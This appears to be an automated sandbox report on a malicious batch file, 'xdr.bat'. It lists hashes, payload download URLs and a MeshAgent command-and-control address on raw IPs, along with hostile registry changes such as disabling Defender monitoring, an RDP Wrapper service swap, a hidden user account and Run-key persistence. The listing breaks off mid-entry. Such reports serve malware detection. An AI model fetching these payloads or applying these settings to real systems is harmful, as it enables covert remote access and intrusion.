Analysis
-
max time kernel
127s -
max time network
131s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
24/10/2024, 17:40
Static task
static1
Behavioral task
behavioral1
Sample
xdr.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
xdr.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
xdr.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
xdr.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral5
Sample
xdr.bat
Resource
win11-20241007-en
General
-
Target
xdr.bat
-
Size
4KB
-
MD5
9e779d369e3ca17fdc894d13c4fd797a
-
SHA1
bf7e34e0da33a587177e66cfcec51f3aa75b4a87
-
SHA256
15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394
-
SHA512
ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1
-
SSDEEP
96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD
Malware Config
Extracted
http://45.139.196.250/ngrok.yml
Extracted
http://45.139.196.250/ngrok.zip
Extracted
http://152.89.239.119/x222.jpg
Extracted
http://45.139.196.250/WindowsUpdate.jpg
Extracted
http://45.139.196.250/auto-install-hrdp.bat
Extracted
http://45.139.196.250/hrdp/hrdp.zip
Extracted
http://45.139.196.250/hrdp/update.zip
Extracted
http://45.139.196.250/hrdp/autoupdate.zip
Extracted
meshagent
2
hawlat
http://45.139.196.71:443/agent.ashx
-
mesh_id
0x2C8478969E4CFA9513F19039B18062AD421F4DAF221C1152A30999ADFFCB13924EE4197808C0B50EB8A4890383CFE71E
-
server_id
71C17FDD46B31764650F2D1D58C0308252130889EAD2CB51F652D3D44DDA6687355E5D788FD7CFD214D97F8E3D42DDAB
-
wss
wss://45.139.196.71:443/agent.ashx
Signatures
-
Detects MeshAgent payload 3 IoCs
resource yara_rule behavioral5/memory/6124-16-0x0000000000860000-0x0000000000C2D000-memory.dmp family_meshagent behavioral5/files/0x001b00000002ab57-18.dat family_meshagent behavioral5/memory/6124-20-0x0000000000860000-0x0000000000C2D000-memory.dmp family_meshagent -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 10 IoCs
flow pid Process 4 5716 powershell.exe 5 5768 powershell.exe 7 3268 powershell.exe 8 1444 powershell.exe 9 4520 powershell.exe 10 2916 powershell.exe 17 704 powershell.exe 18 5720 powershell.exe 24 1712 cscript.exe 26 5324 cscript.exe -
pid Process 3268 powershell.exe 2916 powershell.exe 5720 powershell.exe 6004 powershell.exe 5716 powershell.exe 5768 powershell.exe 704 powershell.exe 1444 powershell.exe 4520 powershell.exe 5332 powershell.exe 5332 powershell.exe 1900 powershell.exe 3464 powershell.exe 3416 powershell.exe 1552 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 9 IoCs
pid Process 560 netsh.exe 2404 netsh.exe 5384 netsh.exe 2100 netsh.exe 3292 netsh.exe 5272 netsh.exe 5720 netsh.exe 2668 netsh.exe 4636 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll" reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2588 attrib.exe 5612 attrib.exe 3028 attrib.exe 2864 attrib.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " s.exe -
Executes dropped EXE 23 IoCs
pid Process 4540 MeshAgent.exe 1208 MeshAgent.exe 1868 RDPWInst.exe 1744 MeshAgent.exe 4280 RDPWInst.exe 5036 RDPWInst.exe 816 MeshAgent.exe 2968 RDPWInst.exe 6000 RDPWInst.exe 3332 MeshAgent.exe 5692 RDPWInst.exe 776 RDPWInst.exe 4728 MeshAgent.exe 1240 RDPWInst.exe 2156 RDPWInst.exe 5708 RDPWInst.exe 3944 MeshAgent.exe 2416 RDPWInst.exe 6068 MeshAgent.exe 4552 MeshAgent.exe 1836 MeshAgent.exe 2976 MeshAgent.exe 5124 MeshAgent.exe -
Loads dropped DLL 7 IoCs
pid Process 2764 svchost.exe 452 svchost.exe 5364 svchost.exe 5152 svchost.exe 3148 svchost.exe 4904 svchost.exe 5780 svchost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 22 raw.githubusercontent.com 24 raw.githubusercontent.com 26 raw.githubusercontent.com 2 raw.githubusercontent.com 11 raw.githubusercontent.com 14 raw.githubusercontent.com 20 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\1847AE59126C78560ED59F49F6BC56F9B9A6BC21 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File created C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_new.ini cscript.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap_new.ini cscript.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe s.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File created C:\Program Files\RDP Wrapper\update.zip powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\autoupdate.zip powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1684 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 27 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1100 PING.EXE 4032 PING.EXE -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742652728901001" MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry 